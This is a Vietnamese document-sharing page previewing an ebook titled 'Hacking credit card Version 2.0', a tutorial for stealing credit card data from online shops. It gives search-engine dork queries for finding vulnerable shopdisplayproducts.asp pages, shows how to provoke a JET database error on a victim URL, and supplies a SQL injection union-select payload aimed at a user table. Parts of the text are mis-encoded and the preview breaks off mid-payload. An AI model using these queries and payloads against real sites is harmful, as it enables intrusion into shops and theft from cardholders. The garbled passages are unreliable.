Ktl-icon-tai-lieu

Hacking credit card Version 2.0

Được đăng lên bởi dungvstrang
Số trang: 66 trang   |   Lượt xem: 10927 lần   |   Lượt tải: 13 lần
Ebook naụy ựỏơỉc viết ra nhằm muỉc ựích laụ
hoỉc hoũi vaụ chia sẽ kiến thỏùc.
Email: hieuitpc@yahoo.com
Homepage: http://cntt.pro.vn
Noải dung cuũa ebook: hai tutorials do hieupc viết vaụ moảt vaụi tutorials khác do
anh em bằng hỏõu viết, trong ựó có moảt vaụi tutorials cũ nhỏng cũng rất ựáng
ựỏơỉc ựỏa vaụo với muỉc ựích ựeă tham khaũo.

Hacking Credit Card Version 2.0 --- Written by Hieupc
shopdisplayproducts.asp?cat='
Sau một thời gian dài TTD bị chia cắt đến nay, hieupc mới bắt đầu viết 1 tutorial về hack credit card mới và cĩ lẽ đây
là tutorial cuối cùng đầy đủ nhất,được hieupc biên soạn và sưu tầm từ nhiều tutorial cũ đến mới vào 1 cái ebook và trả
lời những câu hỏi thắc mắc của các bạn và hieupc cũng đã làm 1 bản Ebook hacking credit card.
Nào giờ chúng ta bắt đầu bắt đầu nhé.
Cách này cũng nhý những cách thơng thường là khai thác theo l ỗi SQL và cũng cĩ thể áp dụng cho 1 số lỗi khác như:
OLE DB, JET Database, ASPẦ

Býớc 1:
Khuyến cáo nên search shop ở www.google.com hoặc www.search.com vì mình thấy 2 site này rất very good.
Từ khố nên dùng:
allinurl:Ợshopdisplayproducts.asp?id=
hoặc allinurl:Ợshopdisplayproducts.asp?cat=1 hoặc allinurl:Ợshopdisplayproducts.asp?cat=2ẦẦ
Search shop theo Domain .com, .net , .bizẦ..:
allinurl:Ợ.com/shopdisplayproducts.asp?cat=,allinurl:Ợ.net/shopdisplayproducts.asp?cat=...
Ai biết chấm gì nữa thì thay vào :)
Khả năng lấy được credit card: là 99.9 % cịn 0.1 % cịn lại phụ thuộc vào cái đầu của bạn.
Xong phần search, bạn thu hoặch lại tất cả các shop bị lỗi và bắt đầu hack.

Býớc 2:
Ví dụ: lấy ví dụ là 1 site thế cĩ dạng thế này : http://www.victim.com
http://www.victim.com/shopdisplayproducts.asp?id=5
Ta sẽ thêm dấu phẩy ( ` ) vào sau số 5:
http://www.victim.com/shopdisplayproducts.asp?id=5'
Xem nĩ cĩ bị lỗi khơng nào, hic nĩ khơng bị lỗi, chỉ thấy thế này:
Home Improvement
Page 1 of 2

Khơng sao, chúng ta hãy bình tĩnh nhé, thay Ộ id Ộ bằng Ộ cat Ộ thử xem:
http://www.victim.com/shopdisplayproducts.asp?id=5'
-->>> http://www.victim.com/shopdisplayproducts.asp?cat=5'
Uh, nĩ lỗi ruì kìa:
5'
Microsoft JET Database Engine error '80040e14'
Syntax error in query expression 'cc.intcatalogid=p.catalogid and cc.intcategoryid=c.categoryid and c.
catdescription like '5'%' and hide=0 order by specialoffer desc,cname'.
/shop$db.asp, line 467

Okie, tiếp tục nhé, bạn sẽ thêm đoạn code sau đây vào:
'%20union%20%20select%201%20from%20tbluser"having%201=1--sp_password
http://www.victim.com/shopdisplayproducts.asp?id=5'...
Ebook naøy ñöôïc vieát ra nhaèm muïc ñích laø
hoïc hoûi vaø chia seõ kieán thöùc.
Email: hieuitpc@yahoo.com
Homepage: http://cntt.pro.vn
Noäi dung cuûa ebook: hai tutorials do hieupc vieát vaø moät vaøi tutorials khaùc do
anh em baèng höõu vieát, trong ñoù coù moät vaøi tutorials cuõ nhöng cuõng raát ñaùng
ñöôïc ñöa vaøo vôùi muïc ñích ñeå tham khaûo.
Hacking credit card Version 2.0 - Trang 2
Để xem tài liệu đầy đủ. Xin vui lòng
Hacking credit card Version 2.0 - Người đăng: dungvstrang
5 Tài liệu rất hay! Được đăng lên bởi - 1 giờ trước Đúng là cái mình đang tìm. Rất hay và bổ ích. Cảm ơn bạn!
66 Vietnamese
Hacking credit card Version 2.0 9 10 159